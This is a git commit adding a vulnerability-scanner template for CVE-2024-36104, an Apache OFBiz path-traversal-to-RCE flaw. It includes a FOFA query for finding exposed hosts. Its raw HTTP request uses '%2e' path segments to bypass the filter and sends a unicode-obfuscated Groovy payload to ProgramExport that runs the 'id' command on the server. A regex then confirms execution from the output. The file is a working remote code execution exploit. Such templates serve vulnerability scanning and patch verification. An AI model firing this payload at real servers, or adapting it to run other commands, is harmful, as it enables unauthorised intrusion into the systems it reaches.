Create CVE-2024-36104.yaml

2024-08-05 17:15:34 +08:00 · 2024-08-05 17:15:34 +08:00 · 3093e88d7f
parent 9bd624a6fd
commit 3093e88d7f
1 changed files with 31 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-36104.yaml
+++ b/http/cves/2024/CVE-2024-36104.yaml
@ -0,0 +1,31 @@
+id: CVE-2024-36104
+
+info:
+  name: Apache OFBiz Path Traversal to RCE (CVE-2024-36104)
+  author: Co5mos
+  severity: critical
+  description: |
+    Apache OFBiz 18.12.14之前版本存在命令执行漏洞，该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter类对路径（请求URL中的特殊字符（如 ；、%2e）限制不当导致攻击者能够绕过后台功能点的过滤器验证，并通过/webtools/control/ProgramExport接口的编程导出功能执行任意Groovy代码获取系统权限。
+  metadata:
+    fofa-query: 'app="Apache_OFBiz"'
+  tags: rce,lfi,apache,ofbiz,cve,cve2024
+
+http:
+  - raw:
+    - |
+      POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+
+      groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
+    
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
+
+      - type: status
+        status:
+          - 200